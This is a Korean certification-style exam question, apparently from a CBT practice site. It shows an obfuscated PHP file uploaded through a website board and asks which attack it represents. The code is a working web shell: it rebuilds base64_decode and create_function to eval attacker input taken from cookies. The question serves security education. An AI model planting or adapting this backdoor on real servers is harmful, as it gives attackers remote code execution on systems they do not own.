홈페이지 게시판을 통해서 아래와 같은 코드가 업로드되었다. 어떤 공격으로 의심되는가?
root@kali:~# cat test.php
<?php
$xsbw = str_replace("f","","fstfrf_rfepflfafcfe");
$tfem="sIGpvaWeo4oYXJeoyeoYeoXlfc2xpY2UoeoJGEsJGMoJGEpLTMpeoKS
kpKTtlY2heovICc8LyceoueoJGsuJz4nO30=";
$ldkx="eowcmVnX3JeolcGxhY2UoYXJyYXkoJyeo9bXlx3PVxzXS8nLeoCcvXH
MeovJyksIGFycmF5KCeocnLCcrJyk";
$mxzo="JGM9J2NvdW50JeozskeoYT0kXeo0NPeoT0eotJRTtpZihyZXNldCgkY
Skeo9PSeocxMicgJiYgeoJeoGMoJGEpP";
$zgwx="eojMpeyReorPSczNeoCc7ZWNobyeoAnPCcuJGsuJz4eonO2V2YWwoeo
YeomFzZTY0Xeo2RlY29kZSh";
$anlz = $xsbw("p", "", "baspe6p4p_pdpepcpopdpe");
$nenu = $xsbw("iv","","ivcreivativeiv_fivuivnivcivtiivon");
$olkw = $nenu('', $anlz($xsbw("eo", "", $mxzo.$zgwx.$ldkx.$tfe
m))); $olkw();- 1Command Injection
- 2SQL Injection
- 3Web Shell
- 4Code Injection
꿈라CBT